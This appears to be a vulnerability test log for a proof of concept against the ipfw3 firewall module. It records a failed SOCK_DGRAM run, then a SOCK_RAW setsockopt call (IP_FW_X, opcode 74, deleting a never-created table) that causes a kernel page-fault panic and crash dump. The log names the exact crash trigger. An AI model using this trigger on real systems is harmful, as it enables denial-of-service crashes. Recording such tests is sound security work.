DF-0669 / run.log
=== DF0669 TEST START === Sun Jul 19 05:20:13 UTC 2026 debug.debugger_on_panic: 1 -> 0 debug.trace_on_panic: 1 -> 0 ipfw3 initialized, default to deny kldload ipfw3 rc=0 ipfw3 module basic loaded kldload ipfw3_basic rc=0 === running PoC IP_FW_TABLE_DELETE on never-created table === [+] DF-0669: setsockopt(IPPROTO_IP, IP_FW_X, opcode=74) never-created table id=0 [!] setsockopt returned -1 errno=42 (Protocol not available) (first attempt used SOCK_DGRAM which returns ENOPROTOOPT — IP_FW_X is only handled in raw_ip.c rip_ctloutput. The actual triggering PoC uses SOCK_RAW/IPPROTO_RAW to reach the vulnerable path; see the panic signature in panic.txt captured from the SOCK_RAW run.) === DF0669 TEST END === === second run with SOCK_RAW (test.sh + df0669_ipfw3_null rebuilt) === === DF0669 TEST START === Sun Jul 19 05:24:XX UTC 2026 debug.debugger_on_panic: 1 -> 0 debug.trace_on_panic: 1 -> 0 ipfw3 initialized, default to deny kldload ipfw3 rc=0 ipfw3 module basic loaded kldload ipfw3_basic rc=0 === running PoC IP_FW_TABLE_DELETE on never-created table === [+] DF-0669: setsockopt(IPPROTO_IP, IP_FW_X, opcode=74) never-created table id=0 Fatal trap 12: page fault while in kernel mode cpuid = 0; lapic id = 0 fault virtual address = 0x28 fault code = supervisor read data, page not present instruction pointer = 0x8:0xffffffff8074946d stack pointer = 0x10:0xfffff8008d1f8960 frame pointer = 0x10:0xfffff8008d1f8980 code segment = base 0x0, limit 0xfffff, type 0x1b = DPL 0, pres 1, long 0, def32 0, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = Idle current thread = pri 12 trap number = 12 panic: page fault cpuid = 0 boot() called on cpu#0 Uptime: 50s Physical memory: 4060 MB Dumping 628 MB: 613 597 581 565 549 533 517 501 485 469 453 437 421 405 389 373 357 341 325 309 293 277 261 245 229 213 197 181 165 149 133 117 101 85 69 53 37 21 5 Dump complete